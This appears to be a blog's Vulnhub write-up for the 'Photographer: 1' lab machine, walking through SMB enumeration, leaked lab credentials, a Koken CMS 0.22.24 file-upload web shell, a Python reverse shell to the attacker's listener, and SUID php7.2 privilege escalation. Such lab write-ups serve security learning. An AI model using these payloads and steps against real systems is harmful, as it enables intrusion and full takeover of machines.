<HTML>
<HEAD>
<!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">

<title>Alienum</title>
<style>
* {
  box-sizing: border-box;
}

body{
background-color: #1b1b1e;
}

li a{
color:#808080;
}

p{
color: green;
}

h1, h2 {
 color: green;
}

.tools h1 ,h2{
 padding-left: 50px;
 font-size: 20px;
}

.tools img{
 left: 5%;
 position: relative;
}

.btn-circle {
  height: 47px;
  width: 47px;
  padding: 6px 0px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 25px;
}

.footer{
  position: relative;
  bottom:0;
}

.social{
 position: relative; 
 bottom:0;
 left: 20px;
}

header{
text-align:center;
}
<!------------------menu-------------------->
.topnav {
  overflow: hidden;
  background-color: #333;
}
.topnav a {
  float: left;
  display: block;
  color: #f2f2f2;
  text-align: center;
  padding: 14px 16px;
  text-decoration: none;
  font-size: 17px;
}
.topnav .icon {
  display: none;
}
.topnav a:hover{
  background-color: #555;
  color: white;
}

@media screen and (max-width: 768px) {
  .topnav a:not(:first-child){
    display: none;
  }
  .topnav a.icon {
    float: right;
    display: block;
  }
}

@media screen and (max-width: 768px) {
  .topnav.responsive {position: relative;}
  .topnav.responsive .icon {
    position: absolute;
    right: 0;
    top: 0;
  }
  .topnav.responsive a {
    float: none;
    display: block;
    text-align: left;
  }
}


@media only screen and (max-width: 1024px) {

 .row{
 padding:absolute;
 }
 
 .col-12 {
   max-width: 100%;
 }
 
 footer{
  position: fixed;
}

.social{
	position: fixed;
	top: 20px;
	left: 75%;
}
}
code.highlighter-rouge {
	background: rgba(0, 0, 0, 0.9);
	border: 1px solid rgba(255, 255, 255, 0.15);
	padding: 0px 3px;
	margin: 0px -3px;
	color: #aa759f;
	border-radius: 2px
}
  </style>
	</HEAD>
	<BODY>	
	<div class="row">
		<div class="col-12">
		<nav class="navbar navbar-expand-lg">
			<div class="topnav" id="myTopnav">
				<a class="nav-link" href="../../index.html">Home <span class="sr-only">(current)</span></a>
				<a class="nav-link" href="../../tools.html">Tools</a>
				<a class="nav-link" href="../../vulnhub.html">Vulnhub</a>
				<a class="nav-link" href="../../about.html">About</a>
				<a href="javascript:void(0);" style="font-size:15px;" class="icon" onclick="myFunction()">&#9776;</a>
			</div>					
		</nav>
         <header>
		  <h1>Photographer: 1, Vulnhub Writeup</h1>
		  <p>Posted by Alienum</p>
		</header> 
		<div class="tools">
		  <p>
		   <h2>Port Scan</h2><br>
		    <img src="source/1.PNG" style="width:500px; height: 500px;"> 
		   </p>
		   <p>
		    <h2>Samba</h2><br>
			<code>smbclient -L $IP<br>
				  smbclient //$IP/sambashare<br>
				  get mailsent.txt<br>
				  get wordpress.bkp.zip<br>
			</code>
			<br>
		    <img src="source/2.PNG" style="width:520px; height: 350px;"> 
		   </p>
		  <p>
		    <h2>Read the mailsent.txt</h2><br>
			<code>
			username : daisa<br>
			password : babygirl<br>	  
			</code>
		    <img src="source/3.PNG" style="width:600px; height: 360px;"> 
		   </p>
		    <p>
		    <h2>Directory scan</h2><br>
			<code>
			dirb http://$TARGET:8000 -f<br>
			</code>
		    <img src="source/5.PNG" style="width:500px; height: 50px;"><br>
			<code>
			 Found /admin/<br>
			</code>
		    <img src="source/51.PNG" style="width:600px; height: 100px;"><br>
		   </p>
		 <p>
		    <h2>Login </h2><br>
			<code>
			 email : daisa@photographer.com<br>
			 password : babygirl<br>
			</code>
		    <img src="source/6.PNG" style="width:520px; height: 320px;"><br>
		  </p>
		  <p>
		    <h2>Koken 0.22.24</h2><br>
			<h1>Search for Koken 0.22.24 vulnerability</h1>
		    <img src="source/7.PNG" style="width:450px; height: 320px;"><br> 
		    <h1>Found : Koken CMS 0.22.24 Shell Upload</h1><br>
		    <img src="source/8.PNG" style="width:600px; height: 500px;"><br>
		    <h1>Create malicious jpg file</h1><br>
			<code>
			  system($_GET['cmd']);<br>
			</code>
		    <img src="source/9.PNG" style="width:400px; height: 200px;"><br>
		    <h1>Upload the image.php.jpg</h1><br>
		    <img src="source/10.PNG" style="width:600px; height: 450px;"><br>
			<h1>Use Burpsuite to change the image.php.jpg => image.php</h1><br>
		    <img src="source/11.PNG" style="width:600px; height: 600px;">
			<br>
			<h1>Move the cursor on the "Download File" to see the original path of the image.php</h1><br>
		    <img src="source/12.PNG" style="width:600px; height: 450px;">
			<br>
			</p>
			<p>
		    <h2>Reverse shell</h2><br>
			<h1>We are able to execute commands.</h1>
		    <img src="source/13.PNG" style="width:800px; height: 320px;"><br> 
		    <h1>Python reverse shell</h1><br>
			<code>
			<h1>|Target machine|</h1> <br>
			  image.php?cmd= python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);<br>
			  s.connect(("YOUR IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);<br> 
			  os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'<br>
			<h1>|Your machine|</h1><br>
			 nc -lvp 4444  
			</code><br>
		    <img src="source/14.PNG" style="width:800px; height: 400px;"><br>
		    <h1>Found the user.txt</h1><br>
			<code>
			  cd /home/daisa/<br>
			  cat user.txt<br>
			</code>
		    <img src="source/15.PNG" style="width:600px; height: 300px;"><br>
			</p>
			<p>
		    <h2>Root Privilege Escalation</h2><br>
			<code>
			find / -perm -u=s -type f 2>/dev/null<br>
			</code>
			<h2>I found the suspicious /usr/bin/php7.2</h2><br>
		    <img src="source/16.PNG" style="width:400px; height: 360px;"> <br>
			<h2>Let's search for GTFOBins php</h2><br>
			<img src="source/161.PNG" style="width:600px; height: 300px;"> <br>
			<h2>We found the SUID exploit, i will use the full path for php7.2</h2><br>
			<code>
			 CMD="/bin/sh"<br>
            /usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"<br>
			</code>
		    <img src="source/17.PNG" style="width:600px; height: 600px;"> 
			<br>
			<h2>Rooted</h2>
		   </p>
		</div> 
		<footer>
			<div class="social">
				<a  href="https://github.com/alienaki">
				<img class="btn btn-circle" src="../../src/github.jpg" >
				</a>
				<a  href="https://twitter.com/AL1ENUM">
				<img  class="btn btn-circle" src="../../src/twitter.jpg" >
				</a>
				<a  href="https://www.hackthebox.eu/profile/314167">
				<img  class="btn btn-circle" src="../../src/htb.jpg" >
				</a>
				<a  href="https://tryhackme.com/p/aeriko">
				<img  class="btn btn-circle" src="../../src/THM.png" >
				</a>
				<br/>
			</div>				
		<footer>
		
		<script>
			function myFunction() {
			  var x = document.getElementById("myTopnav");
			  if (x.className === "topnav") {
				x.className += " responsive";
			  } else {
				x.className = "topnav";
			  }
			}
		</script>
	
	<!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>

	</BODY>
</HTML>
